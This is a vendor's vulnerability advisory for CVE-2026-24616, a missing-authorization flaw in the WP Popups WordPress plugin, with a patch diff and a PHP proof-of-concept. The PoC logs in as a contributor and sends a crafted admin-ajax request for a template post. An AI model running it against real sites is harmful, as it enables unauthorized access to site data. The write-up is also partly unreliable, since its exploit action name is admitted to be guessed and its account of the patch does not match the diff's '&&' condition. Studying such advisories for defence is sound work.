Atomic Edge analysis of CVE-2026-24616:
The WP Popups plugin for WordPress, versions up to and including 2.2.0.5, contains a missing authorization vulnerability. This flaw allows authenticated users with contributor-level permissions or higher to perform unauthorized actions related to popup content templates. The CVSS score of 4.3 reflects a medium-severity access control issue.
Atomic Edge research identifies the root cause as a missing capability check within the content template handling function. The vulnerability resides in the `class-content-templates.php` file. The function that retrieves a template post object, located around line 113, does not verify the user’s capability before performing the `get_post()` operation. This omission allows lower-privileged users to interact with the template system.
The exploitation method involves an authenticated attacker sending a crafted request to a WordPress AJAX endpoint. The attacker must possess at least contributor-level access. The request would target the `admin-ajax.php` handler with an action parameter corresponding to the vulnerable template function. The payload includes an `id` parameter specifying the target template post. The attack bypasses authorization checks that should restrict template management to administrators.
The patch modifies the `class-content-templates.php` file. It adds a conditional check on line 116 to verify the post type is `wppopups-templates`. Before the patch, the function only checked if the retrieved object was an instance of `WP_Post`. The updated logic ensures the function returns false if the post is not of the correct type, preventing operations on non-template posts. The version number in the main plugin file is also updated from 2.2.0.5 to 2.2.0.6.
Successful exploitation enables unauthorized access to popup template data. An attacker could potentially view, modify, or delete template content they should not have permission to access. This could lead to content manipulation, defacement, or disruption of popup functionality on the site. The impact is limited to the plugin’s template system and does not grant full site compromise.
--- a/wp-popups-lite/src/includes/class-content-templates.php
+++ b/wp-popups-lite/src/includes/class-content-templates.php
@@ -113,8 +113,8 @@
}
$post = get_post( absint( $atts['id'] ) );
-
- if ( ! $post instanceof WP_Post ) {
+ // check that is a wp popups template
+ if ( ! $post instanceof WP_Post && $post->post_type !== 'wppopups-templates' ) {
return false;
}
--- a/wp-popups-lite/src/includes/class-rules.php
+++ b/wp-popups-lite/src/includes/class-rules.php
@@ -120,7 +120,6 @@
'page_parent',
'page_template',
'custom_url',
- 'keyword_url',
'visited_n_pages',
'woo_is_shop',
'woo_is_order_received',
--- a/wp-popups-lite/wp-popups-lite.php
+++ b/wp-popups-lite/wp-popups-lite.php
@@ -5,7 +5,7 @@
* Description: Beginner friendly WordPress popup builder plugin.
* Author: timersys
* Author URI: https://timersys.com
- * Version: 2.2.0.5
+ * Version: 2.2.0.6
* Text Domain: wp-popups-lite
* Domain Path: languages
*
@@ -145,7 +145,7 @@
*
* @var string
*/
- public $version = '2.2.0.5';
+ public $version = '2.2.0.6';
/**
* The Popup handler instance.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24616 - WP Popups <= 2.2.0.5 - Missing Authorization
<?php
// Configure the target WordPress site URL
$target_url = 'http://vulnerable-site.com';
// Configure WordPress credentials (Contributor or higher)
$username = 'contributor';
$password = 'password';
// The ID of the wppopups-templates post to target
$template_id = 123;
// Step 1: Authenticate to WordPress to obtain cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies to file
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Step 2: Craft the unauthorized AJAX request to the vulnerable endpoint
// The exact action hook name must be inferred; common pattern is 'wppopups_get_template'
$post_data = array(
'action' => 'wppopups_get_template', // Hypothetical action based on plugin pattern
'id' => $template_id
);
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$ajax_response = curl_exec($ch);
// Output the response which may contain template data if vulnerable
echo "Response: " . htmlspecialchars($ajax_response) . "n";
curl_close($ch);
?>
